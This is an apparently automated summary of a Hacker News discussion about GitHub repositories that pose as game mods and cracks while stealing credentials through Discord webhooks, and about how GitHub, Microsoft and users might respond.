Github scam investigation: Thousands of “mods” and “cracks” stealing data

Original Article ↗ Hacker News Discussion ↗

Role of GitHub in Hosting Malware

  • Strong view that repos used as delivery mechanisms for credential‑stealing malware are “doing harm” and violate GitHub’s active‑malware policy, so they should be removed.
  • Counter‑view: deleting them only moves distribution elsewhere and reduces visibility for researchers; maybe better to flag with strong warnings, extra confirmation steps, or “dangerous repo” banners.
  • Common middle ground: clearly labeled malware/stealer code for research is acceptable; deceptive repos impersonating mods/cracks are not. Intent and presentation matter.

Microsoft / GitHub Abuse Handling

  • Many comments argue Microsoft has a broad spam/malware problem across products (GitHub, Azure feedback, email infrastructure) and weak, slow moderation.
  • Some users report quick, effective action from GitHub abuse team when malware is clearly documented; others describe multi‑day to multi‑month delays or no response at all.
  • Perception that abuse reporting UX is poor, rate‑limited, and not pattern‑based; large campaigns can persist for years.
  • Concern that AI is already generating spammy comments and low‑quality content, yet is not effectively used to combat abuse.

Specific Campaign: Mods/Cracks + Discord Webhooks

  • Malware campaigns target game “mods,” “cracks,” and “cheats,” often aimed at kids, with SEO‑optimized GitHub repos giving them credibility.
  • These typically exfiltrate browser cookies, credentials, crypto, etc. to Discord webhooks.
  • Multiple people note that if you possess the webhook URL you can send a DELETE request to remove it; others suggest it may be better to report to Discord so accounts/servers get banned and data retained for investigations.

User Practices, OS Design, and Piracy

  • Advice: never blindly search GitHub or the web for mods/cracks; only use links from official sites, trusted forums, or reviewed sources.
  • Observation that Defender’s broad flagging of keygens trains some users to disable AV, making them vulnerable when real malware appears.
  • Suggestion that stronger OS‑level isolation (sandboxing apps to only their own files, like Android or Qubes‑style models) would greatly limit damage from running untrusted mods, though this would break many existing integrations.

Mitigations and Community Ideas

  • Proposals include:
    • Locking or “quarantining” suspicious repos rather than outright deletion.
    • An open database + browser extension to warn on known‑bad GitHub repos.
    • Better automation at GitHub for detecting large template‑based campaigns.
  • Some argue focusing on GitHub alone is insufficient since similar abuse exists on npm and other platforms.